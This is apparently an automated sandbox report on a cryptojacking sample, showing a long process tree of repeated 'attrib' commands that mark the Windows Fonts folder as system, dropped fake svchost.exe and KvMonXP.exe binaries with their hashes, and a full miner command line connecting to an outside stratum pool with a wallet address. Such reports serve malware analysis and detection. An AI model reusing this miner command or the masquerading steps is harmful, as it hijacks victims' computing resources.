                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:4852
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                              PID:1340
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                              PID:2636
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                PID:2472
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                PID:4568
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                  PID:4680
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:2452
                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                    PID:3532
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                    PID:2412
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                        PID:4512
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                        PID:2348
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                            PID:2284
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:5080
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                PID:1640
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:740
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                  PID:4252
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:4588
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                    PID:2524
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:3976
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                      PID:1172
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:1352
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:3304
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1960
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                            PID:1920
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:1428
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:3044
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:4936
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                  PID:3612
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:3444
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                    PID:1504
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:2684
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3008
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                      cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:3636
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                          attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                          PID:2240
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:4048
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                            PID:3412
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:5056
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                              PID:4148
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:408
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                PID:884
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1668
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3724
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:2396
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:3280
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:3232
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:4004
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:452
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:2896
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:2568
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1316
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:872
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1712
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3960
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:4820
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3996
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1140
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4588
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1984
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3904
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3492
                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:628
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5040
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1628
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                  cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:668
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1508
                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                    cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3788
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:3636
                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:4132
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1204
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            cmd /c attrib +s +a %SystemRoot%\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                attrib +s +a C:\Windows\Fonts
                                                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3784
                                                                                                                                                                                                                                                                                                                                                                                                                                        • \??\c:\windows\Fonts\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          c:\windows\Fonts\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:2544
                                                                                                                                                                                                                                                                                                                                                                                                                                          • \??\c:\windows\Fonts\KvMonXP.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "KvMonXP" -o stratum+tcp://max.csrss.website:5555 -u 49tzxeXRHecDF4bHMDFU4iRpVqHTJiYJiJxv4MgkD2JMCjw3UQSWV3qBbZqDHfsNEbDzU8hLq9UqH4MBoxy36RBvFuVfasv -p x -k --donate-level=1 --max-cpu-usage=50 --print-time=5 --nicehash
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1760

                                                                                                                                                                                                                                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tem.vbs

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          257B

                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                          f88a489a387ebc7c4c0c6b122ff6aa9b

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                          197f045b81fc47892ec4b879f4b55ef1fda8f307

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                          8d6df3f20ca96ef6e033fe7c442f76784bed8aad65e7272b384175e4b9412a5a

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                          046a13ce212c374adf315b1d3c95bf4044feee01b44eaa91b48cb1885660899473f5934031b1fef8ee2639fa4b322e83ebea1ad42fbb9100fd3f66fd3b59c391

                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Fonts\KvMonXP.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                          614a11a087f7e05063f6211c114a29ba

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                          903e200c338fd0a15e87214824c7f670cc7d282c

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                          dda35a9441451839439a7da695209c6164ca0e7d0159b4bc012406a8a3f18ce4

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                          947521a703af5c097199001f62cefc58b65d7cf723a4afe5a3b1f0b80e16ce7f357b1874f31b1cc5f55907fc18480e903313edcee02328b2527c00559d6d9f96

                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Fonts\conhost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          4.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                          5d57bf45fb91812ead7ad8da8c3936a2

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                          099c88af6ea4a49d2f80123c47fe85407ec42d69

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                          553b1ab96e8204792f764fe25331aef9fa4c479b11b6154551d1b609e0158019

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                          66b04caac0f5e1904bbd567a25734bf80dcf8982737e7bf6c68b10f07dd955445743ba76c0bad8cabf3650ec8202f73b864553ae10e39914a7c13395ee2a5cf3

                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Fonts\svchost.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          292KB

                                                                                                                                                                                                                                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                          0a7d7ed55c4202f5106824f11ecb22fa

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                          730da74e178d7b114e5d4c0f1dcc956accd4942d

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                          5657876e79df5212f255b4bfb0f69df9b09be4ae833e1b170de78a37b7179595

                                                                                                                                                                                                                                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                          45a4652d229491c936b0fd5839b335ae924d5b7ee5b05925ebb2f0bb8ca030fca9544ecf4050089b04195e877fcdae4657cd29621299e053398093ee4e5fadb7

                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/1760-35-0x000001D714D30000-0x000001D714D40000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                          64KB

                                                                                                                                                                                                                                                                                                                                                                                                                                        • memory/2784-0-0x0000000000400000-0x00000000009C1000-memory.dmp

